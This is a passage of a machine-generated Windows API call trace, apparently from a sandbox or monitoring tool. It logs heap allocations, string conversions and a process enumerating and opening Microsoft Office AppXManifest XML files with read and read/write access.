hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69080 [0098.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0098.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0098.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69080 | out: hHeap=0x20000) returned 1 [0098.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c458 [0098.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0098.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0098.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0098.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0098.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0098.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0098.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0098.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0098.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89640 [0098.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88b60 [0098.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89640 | out: hHeap=0x20000) returned 1 [0098.977] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.977] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.977] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.977] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88b60 | out: hHeap=0x20000) returned 1 [0098.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.977] AreFileApisANSI () returned 1 [0098.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0098.978] AreFileApisANSI () returned 1 [0098.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 105 [0098.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.111] GetFileType (hFile=0x368) returned 0x1 [0099.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.111] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.111] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.111] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.112] CloseHandle (hObject=0x368) returned 1 [0099.112] AreFileApisANSI () returned 1 [0099.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 105 [0099.112] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.112] GetFileType (hFile=0x368) returned 0x1 [0099.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.112] CloseHandle (hObject=0x368) returned 1 [0099.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0099.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0099.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0099.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0099.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0099.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0099.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0099.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0099.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0099.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0099.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0099.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0099.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.114] AreFileApisANSI () returned 1 [0099.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 105 [0099.114] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x834d1316, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x834d1316, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8351d7a8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xfdea)) returned 1 [0099.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.114] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.114] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.114] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83ea71ba, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83ea71ba, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x841a1e52, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", cAlternateFileName="AP6EFE~1.XML")) returned 1 [0099.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0099.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0099.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0099.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c7a0 [0099.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0099.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0099.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0099.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0099.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88c48 [0099.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88d30 [0099.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88c48 | out: hHeap=0x20000) returned 1 [0099.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88d30 | out: hHeap=0x20000) returned 1 [0099.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.115] AreFileApisANSI () returned 1 [0099.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0099.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.115] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.115] AreFileApisANSI () returned 1 [0099.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.115] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 105 [0099.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.116] GetFileType (hFile=0x368) returned 0x1 [0099.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.116] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.116] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.116] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.117] CloseHandle (hObject=0x368) returned 1 [0099.117] AreFileApisANSI () returned 1 [0099.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 105 [0099.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.117] GetFileType (hFile=0x368) returned 0x1 [0099.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.117] CloseHandle (hObject=0x368) returned 1 [0099.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0099.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0099.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0099.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0099.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0099.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0099.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0099.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.118] RtlAllocateHeap 